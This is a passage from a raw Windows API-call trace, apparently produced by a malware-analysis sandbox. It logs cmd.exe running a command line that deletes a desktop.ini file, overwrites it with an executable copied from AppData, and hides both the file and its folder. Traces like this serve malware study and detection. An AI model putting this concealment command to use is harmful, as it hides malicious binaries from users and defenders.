lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x9, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegCloseKey (hKey=0x40) returned 0x0 [0131.805] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.805] srand (_Seed=0x5b886366) [0131.805] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" [0131.805] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" [0131.805] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.805] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1c68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.806] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.806] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.806] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.806] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.806] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.806] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.806] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.806] _wcsicmp (_String1="PROMPT", 
_String2="DATE") returned 12 [0131.806] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.806] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.806] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.806] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.806] GetEnvironmentStringsW () returned 0x3b2658* [0131.806] FreeEnvironmentStringsW (penv=0x3b2658) returned 1 [0131.806] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.806] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.806] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.806] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.806] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.806] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.806] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.806] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.806] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.806] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.806] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.806] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf598, lpFilePart=0x2cf594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf594*="Desktop") returned 0x18 [0131.806] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.806] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf314 | out: lpFindFileData=0x2cf314) returned 0x3b0ce8 [0131.807] FindClose (in: hFindFile=0x3b0ce8 | out: hFindFile=0x3b0ce8) 
returned 1 [0131.807] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf314 | out: lpFindFileData=0x2cf314) returned 0x3b0ce8 [0131.807] FindClose (in: hFindFile=0x3b0ce8 | out: hFindFile=0x3b0ce8) returned 1 [0131.807] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf314 | out: lpFindFileData=0x2cf314) returned 0x3b0ce8 [0131.807] FindClose (in: hFindFile=0x3b0ce8 | out: hFindFile=0x3b0ce8) returned 1 [0131.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.807] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.807] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.807] GetEnvironmentStringsW () returned 0x3b0508* [0131.808] FreeEnvironmentStringsW (penv=0x3b0508) returned 1 [0131.808] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.808] GetConsoleOutputCP () returned 0x1b5 [0131.808] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.808] GetUserDefaultLCID () returned 0x409 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf6d8, cchData=128 | out: lpLCData="0") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf6d8, cchData=128 | out: lpLCData="0") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf6d8, cchData=128 | out: lpLCData="1") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") 
returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.809] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.810] GetConsoleTitleW (in: lpConsoleTitle=0x3a0b10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.810] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.810] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.810] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.811] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0131.811] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0131.811] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0131.811] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0131.811] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0131.811] _wcsicmp (_String1="REM", _String2="attrib") returned 17 
[0131.811] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0131.814] _wcsicmp (_String1="del", _String2=")") returned 59 [0131.814] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0131.814] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0131.814] _wcsicmp (_String1="IF", _String2="del") returned 5 [0131.814] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0131.814] _wcsicmp (_String1="REM", _String2="del") returned 14 [0131.814] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0131.816] _wcsicmp (_String1="type", _String2=")") returned 75 [0131.816] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0131.816] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0131.816] _wcsicmp (_String1="IF", _String2="type") returned -11 [0131.816] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0131.816] _wcsicmp (_String1="REM", _String2="type") returned -2 [0131.816] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0131.820] SetErrorMode (uMode=0x0) returned 0x0 [0131.820] SetErrorMode (uMode=0x1) returned 0x0 [0131.820] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b0510, lpFilePart=0x2cee8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cee8c*="Desktop") returned 0x18 [0131.820] SetErrorMode (uMode=0x0) returned 0x1 [0131.820] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.820] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.825] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0xffffffff [0131.826] GetLastError () returned 0x2 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0xffffffff [0131.826] GetLastError () returned 0x2 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0x3b07f8 [0131.826] FindClose (in: hFindFile=0x3b07f8 | out: hFindFile=0x3b07f8) returned 1 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0xffffffff [0131.826] GetLastError () returned 0x2 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0x3b07f8 [0131.827] FindClose (in: hFindFile=0x3b07f8 | out: hFindFile=0x3b07f8) returned 1 [0131.827] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.827] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.827] GetConsoleTitleW (in: lpConsoleTitle=0x2cf100, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.941] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cef88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf050 | out: lpAttributeList=0x2cef88, lpSize=0x2cf050) returned 1 [0131.941] UpdateProcThreadAttribute (in: lpAttributeList=0x2cef88, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf048, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cef88, lpPreviousValue=0x0) returned 1 [0131.941] 
GetStartupInfoW (in: lpStartupInfo=0x2cef44 | out: lpStartupInfo=0x2cef44*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0131.941] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.942] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cefe4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf030 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessInformation=0x2cf030*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb2c, dwThreadId=0xaf4)) returned 1 [0132.053] CloseHandle (hObject=0x4c) returned 1 [0132.053] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.053] GetEnvironmentStringsW () returned 0x3b0a38* [0132.053] FreeEnvironmentStringsW (penv=0x3b0a38) returned 1 [0132.053] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0132.228] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cef24 | out: lpExitCode=0x2cef24*=0x0) returned 1 [0132.228] CloseHandle (hObject=0x50) returned 1 [0132.228] _vsnwprintf (in: _Buffer=0x2cf06c, 
_BufferCount=0x13, _Format="%08X", _ArgList=0x2cef30 | out: _Buffer="00000000") returned 8 [0132.228] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.228] GetEnvironmentStringsW () returned 0x3b2658* [0132.228] FreeEnvironmentStringsW (penv=0x3b2658) returned 1 [0132.228] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.228] GetEnvironmentStringsW () returned 0x3b2658* [0132.228] FreeEnvironmentStringsW (penv=0x3b2658) returned 1 [0132.228] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cef88 | out: lpAttributeList=0x2cef88) [0132.228] GetConsoleTitleW (in: lpConsoleTitle=0x2cf308, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.228] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ce380, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ce384, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ce380*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0132.229] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0132.229] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.229] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.229] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\desktop.ini")) returned 0xffffffff [0132.229] GetLastError () returned 0x2 [0132.229] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x10 [0132.229] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.229] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.229] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\desktop.ini")) returned 0xffffffff [0132.229] GetLastError () returned 0x2 [0132.229] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3b36e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b36e4) returned 0xffffffff [0132.229] GetLastError () returned 0x2 [0132.229] _get_osfhandle (_FileHandle=2) returned 0xb [0132.230] GetFileType (hFile=0xb) returned 0x2 [0132.230] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0132.230] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ced80 | out: lpMode=0x2ced80) returned 1 [0132.230] _get_osfhandle (_FileHandle=2) returned 0xb [0132.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2cedb4 | out: lpConsoleScreenBufferInfo=0x2cedb4) returned 1 [0132.230] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0132.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.231] GetFileType (hFile=0x7) returned 0x2 [0132.231] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.231] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf4a4 | out: lpMode=0x2cf4a4) returned 1 [0132.231] _dup (_FileHandle=1) returned 3 [0132.231] _close (_FileHandle=1) returned 0 [0132.231] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini", _String2="con") returned -53 [0132.231] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x2cf474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0132.233] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0132.233] GetConsoleTitleW (in: lpConsoleTitle=0x2cf2a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.233] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2cee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee08) returned 0x3ae6d8 [0132.233] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0132.233] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0132.233] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0132.233] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cdd14, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0132.233] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] GetFileType (hFile=0x58) returned 0x1 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2cdd6c | out: lpFileSizeHigh=0x2cdd6c*=0x0) returned 0x7d600 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.233] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.234] GetFileType (hFile=0x50) returned 0x1 [0132.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.234] GetFileType (hFile=0x50) returned 0x1 [0132.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] GetFileType (hFile=0x50) returned 0x1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.236] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.236] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.236] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] GetFileType (hFile=0x50) returned 0x1 [0132.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.237] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.237] _get_osfhandle 
